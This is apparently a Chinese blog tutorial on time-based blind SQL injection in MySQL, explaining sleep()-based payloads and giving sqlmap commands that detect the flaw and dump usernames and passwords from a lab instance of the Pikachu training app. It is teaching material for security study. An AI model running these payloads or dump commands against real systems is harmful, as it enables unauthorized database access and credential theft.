SQL注入之路之四:时间注入

时间注入

原理分析

时间注入又名延时注入,属于盲注的一种,通常是某个注入点无法通过布尔型注入获取数据而采取的一种突破注入的技巧。
在MySQL里函数sleep()是延时的意思,sleep(10)就是数据库延时10秒返回内容。判断注入可以使用’and sleep(10)意思是数据库延时10秒返回内容值(页面响应时间至少为10秒)
MySQL延时注入用到的函数sleep()、if()、substring() select if(2>1,sleep(10),0)2>1这部分就是你注入要构造的SQL语句。
select if(length(database())>1,sleep(5),0)这个就是查询当前数据库长度,如果成立网页就大于5秒返回,如果不成立就立即执行 根据这个原理n>1,n不延时就可以确认当前数据库的长度
在这里插入图片描述

黑盒模式下的时间注入

在黑盒模式下常使用sqlmap来对注入进行检测(sqlmap支持多种数据库注入,而且支持多种注入方式)

1.打开kali里的sqlmap

输入sqlmap
在这里插入图片描述
sqlmap设置具体SQL注入技术
参数 --technique 此参数用于指定检测注入时所用技术。默认情况下Sqlmap会使用自己支持的全部技术进行 检测。 此参数后跟表 示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下:
B:Boolean-based blind(布尔型注入)
E:Error-based(报错型注入)
U:Union query-based(可联合查询注入)
S:Stacked queries(可多语句查询注入)
T:Time-based blind(基于时间延迟注入)
Q:Inline queries(嵌套查询注入)

2.判断是否存在时间盲注

sqlmap -u"http://192.168.233.152/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T -batch

在这里插入图片描述
-u 表示检测的 url
-p 指定的检测参数
-v 显示调试模式
–technique=T 检测方法为时间注入

3.获取用户名和当前数据库

sqlmap -u"http://192.168.233.152/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --current-user --current-db -batch

在这里插入图片描述
–current-user 获取用户
–current-db 当前库
–batch 使用默认模式 自动y

4.获取当前数据库中所有的表

 sqlmap -u"http://192.168.233.152/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --tables -D pikachu -batch

在这里插入图片描述

5.获取到表中的字段
qlmap -u"http://192.168.233.152/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --columns -T users -D pikachu -batch

在这里插入图片描述

获取字段的重要信息
sqlmap -u"http://192.168.233.152/06/vul/sqli/sqli_blind_t.php?name=1&submit=%E6%9F%A5%E8%AF%A2" -p name -v 1 --technique=T --dump -C"id,username,password" -T users -D pikachu -batch

在这里插入图片描述

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值